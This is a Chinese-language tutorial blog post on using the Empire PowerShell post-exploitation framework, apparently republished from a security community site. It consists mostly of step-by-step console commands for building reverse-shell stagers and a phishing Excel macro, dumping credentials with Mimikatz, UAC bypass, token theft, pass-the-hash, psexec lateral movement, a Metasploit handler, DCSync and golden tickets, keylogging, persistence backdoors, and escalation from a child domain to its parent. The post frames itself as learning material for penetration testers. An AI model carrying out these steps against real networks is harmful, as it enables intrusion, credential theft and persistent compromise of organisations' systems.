后渗透测试神器Empire的详解

2019-04-04 约 3608 字 预计阅读 8 分钟

声明:本文 【后渗透测试神器Empire的详解】 由作者 backlion 于 2017-09-11 02:38:00 首发 先知社区 曾经 浏览数 5782 次

感谢 backlion 的辛苦付出!

一、前言

Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适应通信躲避网络检测,所有的这些功能都封装在一个以实用性为重点的框架中

二、empire使用详解

1.Empire 的安装

wget https://raw.githubusercontent.com/backlion/demo/master/Empire-master.zip
unzip Empire-master.zip
cd  Empire-master
cd setup/
./install.sh
(最后输入数据库密码)

注意:新版本貌似有点小问题,我这里采用2015年旧版本可以正常使用.新版本命令有所改变。

重新恢复到初始状态:

root@backlion:/opt/Empire-master# cd setup/
root@backlion:/opt/Empire-master/setup# ls
root@backlion:/opt/Empire-master/setup#

2.简单命令使用

cd  Empire-master
./empire

(Empire) > help #主菜单帮助命令

(Empire) > listeners #查看本地监听代理地址,现在还没有会话代理,所以为空

(Empire: listeners) > info #列出详细信息

(Empire: listeners) > set Name bk #设置Name为bk

(Empire: listeners) > execute #执行命令,这条命令将其name设置生效

(Empire: listeners) > usestager launcher bk #调用posershell模块并, name为bk

(Empire: agents) > interact USSZC2P1XCTBKYGH

(Empire: USSZC2P1XCTBKYGH) > upload /tmp/test.hta #文件上传

(Empire: USSZC2P1XCTBKYGH) > shell dir

(Empire: USSZC2P1XCTBKYGH) > download test.hta #文件下载

代理监听IP地址更改:

通过kali下的SQLiteBrowser打开empire下data目录下的数据库empire.db修改监听IP

3.生成反弹shell代理:

3.1 posershell反弹shell代理

(Empire: listeners) > usestager(空格+tab) #查看usestager监听模块

(Empire: listeners) > usestager launcher test #调用powershell模块,test为name名称,这里的name需要提前设置,否则无法导入模块

(Empire: stager/launcher) > execute #执行命令


将上面生成的posershell命令在win7及系统以上执行:


执行命令后Empire端会显示监听成功:

3.2 vbs反弹shell代理

(Empire: listeners) > usestager launcher_vbs test

(Empire: stager/launcher_vbs) > execute #执行命令

将launcher.vbs拷贝到目标主机上执行:

执行命令后Empire端显示监听成功:

(Empire: stager/launcher_vbs) > execute

3.3 钓鱼宏代理

在empire端执行:

(Empire: listeners) > usestager macro bk
(Empire: stager/macro) > info
(Empire: stager/macro) > execute
root@backlion:~#cat  /tmp/macro

将生产的代码复制创建到execl的宏代码中:

这里是将保存为execl2003的文档并执行:

4.代理界面的命令使用

(Empire: stager/launcher_vbs) > agents #查看代理情况,带有(*)的是已被提升过的代理,可通过bypassuac进行提权

(Empire: agents) > rename EEDLABPF43FAGWHZ DC #重新命名代理名

(Empire: agents) > list #列出代理

(Empire: agents) > list stale #列出已丢失反弹代理

(Empire: agents) > remove stale #删除已丢失反弹代理

(Empire: agents) > list

(Empire: agents) > interact Y1DMVFG4CGKB24KP #进入到某个代理主机中,这里注意的是带有*的用户名对应的代理是具有管理员高权限代理。如果是没有需要提权。

(Empire: Y1DMVFG4CGKB24KP) > help #代理界面的命令使用帮助

(Empire: TKRTTL2V3BNRVDK4) > mimikatz #加载mimikatz获取hash

(Empire: TKRTTL2V3BNRVDK4) > creds #查看所有hash值包括明文

(Empire: DGPWHW4E2Z2NT3PL) > creds krbtgt #搜索特定用户的krbtgt

(Empire: DGPWHW4E2Z2NT3PL) > creds plaintext #搜索hash中的明文

(Empire: DGPWHW4E2Z2NT3PL) > creds hash #列出所有hash值(不包括明文)

(Empire: DGPWHW4E2Z2NT3PL) > creds export /opt/hash.csv #导出hash凭证到指定的格式

root@backlion:/opt# cat hash.csv

(Empire: TKRTTL2V3BNRVDK4) > shell ipconfig #查看IP地址

(Empire: TKRTTL2V3BNRVDK4) > shell net localgroup administrators #查看管理员组

(Empire: TKRTTL2V3BNRVDK4) > back #返回上一层

5.模块化使用案列:

5.1检查UAC提权方法模块

(Empire: agents) > interact P2V4CXEGRPHUD43T #进入到代理主机

(Empire: P2V4CXEGRPHUD43T) > usemodule(空格+tab键) #查看usemodule的模块,注意需要在进入到代理主机才能使用该模块,UAC提权需要是管理员组的用户才行

(Empire: P2V4CXEGRPHUD43T) > usemodule privesc/powerup/allchecks #检查提权方法模块

(Empire: privesc/powerup/allchecks) > execute #执行检查

(Empire: privesc/powerup/allchecks) > back #返回上一命令界面

5.2 UAC提权模块

(Empire: P2V4CXEGRPHUD43T) > bypassuac test #执行uac提权,这里的test就是默认的name,可以自定义,貌似有问题,建议默认就可以了。

(Empire: P2V4CXEGRPHUD43T) > agents #查看到提权后UAC的name对应主机(带有*的用户的name,表示代理已提权过)

(Empire: agents) > interact P2V4CXEGRPHUD43T #进入提权后的的uac主机

(Empire: P2V4CXEGRPHUD43T) > ps #查看进程

5.3 本地管理组访问模块

(Empire: HPEUGGBSPSAPWGZW) >usemodule situational_awareness/network/find_localadmin_access #加载本地管理组访问模块

(Empire: situational_awareness/network/find_localadmin_access) > info #查看信息

(Empire: situational_awareness/network/find_localadmin_access) > execute #执行命令

(Empire: situational_awareness/network/find_localadmin_access) > back #返回上一命令界面

5.4用户账号枚举信息

(Empire: HPEUGGBSPSAPWGZW) > situational_awareness/network/get_use 
(Empire: situational_awareness/network/get_user) > set UserName  bk
(Empire: situational_awareness/network/get_user) > set Domain bk.com
(Empire: situational_awareness/network/get_user) > execute #这里可以累出具体某个用户的信息

5.5网络用户会话登录情况

(Empire: HPEUGGBSPSAPWGZW) >usemodule situational_awareness/network/userhunter
(Empire: situational_awareness/network/userhunter) > info
(Empire: situational_awareness/network/userhunter) > execute  #这里可以清楚得到那个用户登录给某台主机

5.6 网络扫描

(Empire: HPEUGGBSPSAPWGZW) > shell ping  -a -n 1  192.168.99.104 #这里ping管理员登录过的会话IP地址所得到主机名
(Empire: HPEUGGBSPSAPWGZW) > usemodule  situational_awareness/network/arpscan
(Empire: situational_awareness/network/arpscan) > info
(Empire: situational_awareness/network/arpscan) > set Range 10.0.0.100-10.0.0.254
(Empire: situational_awareness/network/arpscan) > info
(Empire: situational_awareness/network/arpscan) > execute

5.6 DNS信息获取

(Empire: situational_awareness/network/arpscan) >usemodule situational_awareness/network/reverse_dns
(Empire: situational_awareness/network/reverse_dns) > info
(Empire: situational_awareness/network/reverse_dns) > execute

5.7 共享文件

(Empire: situational_awareness/network/reverse_dns) >usemodule situational_awareness/network/sharefinder
(Empire: situational_awareness/network/sharefinder) > info
(Empire: situational_awareness/network/sharefinder) > set  CheckShareAccess  True
(Empire: situational_awareness/network/sharefinder) > execute

5.8 会话令牌偷取获取目标访问权限

(Empire: agents) > interact S4DU3VSRKR3U1DDF
(Empire: S4DU3VSRKR3U1DDF) > ps cmd
(Empire: S4DU3VSRKR3U1DDF) > steal_token  3716
(Empire: S4DU3VSRKR3U1DDF) > shell dir \\SCAN03\c$

5.9 psexec模块横向生成一个反弹代理

(Empire: S4DU3VSRKR3U1DDF) > usemodule lateral_movement/invoke_psexec
(Empire: lateral_movement/invoke_psexec) > info
(Empire: lateral_movement/invoke_psexec) > set Listener test
(Empire: lateral_movement/invoke_psexec) > set ComputerName SCAN03
(Empire: lateral_movement/invoke_psexec) > execute
Empire: lateral_movement/invoke_psexec) > agents

5.10 会话注入得到反弹代理

(Empire: agents) > interact YU3NGBFBPGZTV1DD
(Empire: YU3NGBFBPGZTV1DD) > ps cmd
(Empire: YU3NGBFBPGZTV1DD) > usemodule management/psinject
(Empire: management/psinject) > info
(Empire: management/psinject) > set ProcId 6536 #注入进程建议是lass.exe对应的进程
(Empire: management/psinject) > set  Listener test
(Empire: management/psinject) > execute
(Empire: management/psinject) > agents

5.11 Empire和msf的联动

在empire终端执行:

(Empire: agents) > interact XCLLHZZPAWPN1REL
(Empire: XCLLHZZPAWPN1REL) > usemodule code_execution/invoke_shellcode
(Empire: code_execution/invoke_shellcode) > info
(Empire: code_execution/invoke_shellcode) > set Lhost  10.0.0.86
(Empire: code_execution/invoke_shellcode) > set Lport 4433
(Empire: code_execution/invoke_shellcode) > execute

在msf终端执行(这里和empire同一个主机上)

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set lhost 10.0.0.86
msf exploit(handler) > set lport 4433
msf exploit(handler) > set exitsession false
msf exploit(handler) > exploit -j

5.12 pass the hash

(Empire: XCLLHZZPAWPN1REL) > creds
(Empire: XCLLHZZPAWPN1REL) > pth  7  #进入到令牌pth的cerdiD值
(Empire: XCLLHZZPAWPN1REL) > steal_token  12004  #偷取令牌PID值
(Empire: XCLLHZZPAWPN1REL) > dir  \\SCAN03\c$ #利用获取到目标令牌会话来访问目标权限的共享目录
(Empire: XCLLHZZPAWPN1REL) > revtoself   #将恢复令牌权限回到原来的状态。

5.13 psexec横向渗透

(Empire: HPEUGGBSPSAPWGZW) > usemodule lateral_movement/invoke_psexec #使用该模块横向渗透
(Empire: lateral_movement/invoke_psexec) > info 
(Empire: lateral_movement/invoke_psexec) > set ComputerName SCAN03.bk.com 
(Empire: lateral_movement/invoke_psexec) > set Listener test
(Empire: lateral_movement/invoke_psexec) > execute

5.14 域的krbtgt值

(Empire: EEDLABPF43FAGWHZ) > usemodule credentials/mimikatz/dcsync  #获取域的krbtgt值,这里注意的是域需要域管理员身份才能获取,普通工作组账户的krbtgt需要管理员身份
(Empire: credentials/mimikatz/dcsync) > set user dc2\krbtgt
(Empire: credentials/mimikatz/dcsync) > info
(Empire: credentials/mimikatz/dcsync) > execute

5.15 Golden Tickets

(Empire: EEDLABPF43FAGWHZ) > usemodule credentials/mimikatz/golden_ticket
(Empire: credentials/mimikatz/golden_ticket) > creds
(Empire: credentials/mimikatz/golden_ticket) > set CredID 1
(Empire: credentials/mimikatz/golden_ticket) > set user  administrator
(Empire: credentials/mimikatz/golden_ticket) > execute
(Empire: credentials/mimikatz/golden_ticket) >usemodule credentials/mimikatz/purge  #清理黄金票据会话
(Empire: credentials/mimikatz/golden_ticket) > execute

5.16 获取系统日志事件

(Empire: situational_awareness/network/reverse_dns) >usemodule situational_awareness/host/computerdetails
(Empire: situational_awareness/host/computerdetails) > info
(Empire: situational_awareness/host/computerdetails) > execute

5.17 收集目标主机有用的信息

(Empire: agents) > interact EEDLABPF43FAGWHZ
(Empire: EEDLABPF43FAGWHZ) > usemodule situational_awareness/host/winenum
(Empire: situational_awareness/host/winenum) > info
(Empire: situational_awareness/host/winenum) > info

5.18 查看网络共享

(Empire: EEDLABPF43FAGWHZ) >usemodule  situational_awareness/network/stealth_userhunter
(Empire: situational_awareness/network/stealth_userhunter) > info
(Empire: situational_awareness/network/stealth_userhunter) > execute

5.19 桌面截屏

(Empire: USSZC2P1XCTBKYGH) > usemodule collection/screenshot
(Empire: collection/screenshot) > info
(Empire: collection/screenshot) > execute

(Empire: collection/screenshot) > usemodule collection/keylogger
(Empire: collection/keylogger) > info
(Empire: collection/keylogger) > execute

5.20 权限持久性的注册表注入

(Empire: EEDLABPF43FAGWHZ) > usemodule persistence/userland/registry
(Empire: persistence/userland/registry) > info
(Empire: persistence/userland/registry) > set Listener bk
(Empire: persistence/userland/registry) >set RegPath HKCU:Software\Microsoft\Windows\CurrentVersion\Run
(Empire: persistence/userland/registry) > execute

5.21 权限持久性的计划任务注册

在empire上执行计划任务:

(Empire: WC1PKXFTA4KNTFN4) > usemodule persistence/userland/schtasks
(Empire: persistence/userland/schtasks) > info
(Empire: persistence/userland/schtasks) > set Listener bk
(Empire: persistence/userland/schtasks) > set DailyTime  05:00
(Empire: persistence/userland/schtasks) >set RegPath HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
(Empire: persistence/userland/schtasks) > execute

同时在目标主机上查看计划任务和注册表情况可以看到成功创建:

5.22 权限持久性的AD用户是否存在触发

(Empire: AG2RV3CFLLY4PZZ4) > usemodule persistence/powerbreach/deaduser
(Empire: persistence/powerbreach/deaduser) > info
(Empire: persistence/powerbreach/deaduser) > set Username  DC2\test
(Empire: persistence/powerbreach/deaduser) > set Listener bk
(Empire: persistence/powerbreach/deaduser) > execute

只要AD域管理员上修改用户名或者删除用户名就会触发生产后门,这里是将test用户修改为bk,马上触发条件。

5.21权限持久性劫持shift后门

(Empire: ASMR14VVZG4A33AE) > usemodule lateral_movement/invoke_wmi_debugger
(Empire: lateral_movement/invoke_wmi_debugger) > info
(Empire: lateral_movement/invoke_wmi_debugger) > set Listener  bk
(Empire: lateral_movement/invoke_wmi_debugger) > set TargetBinary sethc.exe
\#注意这里可以将sethc.exe替换为Utilman.exe(快捷键为: Win + U)或者osk.exe(屏幕上的键盘Win + U启动再选择)Narrator.exe (启动讲述人Win + U启动再选择) Magnify.exe(放大镜Win + U启动再选择)
(Empire: lateral_movement/invoke_wmi_debugger) > set ComputerName  CLINCET2
(Empire: lateral_movement/invoke_wmi_debugger) > execute

在目标主机上远程登录的时候按5次shift即可触发后门代理

6.子域和父域的信任跳转

  1. lab.local和dev.lab.local分别为父域和子域,现已得到子域的反弹代理。

  2. 在子域上通过:

usemodule situational_awareness/network/powerview/get_domain_trust模块来检查子域和父域的信任关系(dev.lab.local 和他的父域lab.local是双向信任,子域的DA证书来控制整个域)

  1. 得到父域lab.local的LAB\krbtg账号sid值,这里使用模块

usemodule management/user_to_sid,并设置域,以及用户名

4.通过模块usemodule credentials/mimikatz/dcsync获取子域账号krbtgt的hash值,这里只需设置子域账号即可


5.通过creds krbtget 搜索子域krbtget的hash值:

6.通过黄金票据来伪造(usemodule credentials/mimikatz/golden_ticket)父域lab.local\Enterprise管理员账号,这里需要设置伪造的用户为子域中的一个普通账号,设置sids为父域krbtget的sid值需要把后面的502改成519,最后执行


7.通过模块usemodule credentials/mimikatz/dcsync获取父域账号krbtgt的hash值,这里只需设置子域账号,以及父域的名称

8.再次通过creds krbtgt搜索出hash 值可得到父域的hash值:

9.子域具有访问父域的共享文件权限

(Empire: DGPWHW4E2Z2NT3PL) >usemodule credentials/mimikatz/golden_ticket t
(Empire: DGPWHW4E2Z2NT3PL) > set CredID 14
(Empire: DGPWHW4E2Z2NT3PL) > set user lolhax
(Empire: DGPWHW4E2Z2NT3PL) >set sids 95505cle3d98a458128845353b988
(Empire: DGPWHW4E2Z2NT3PL) >execute

三、emprie总结

通过一系列学习emprie功能,它可以联动MSF进行更为强大的后渗透测试,甚至包括强大的权限持久性以及对域的渗透丰富功能模块。

关键词:[‘新手’, ‘入门资料’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now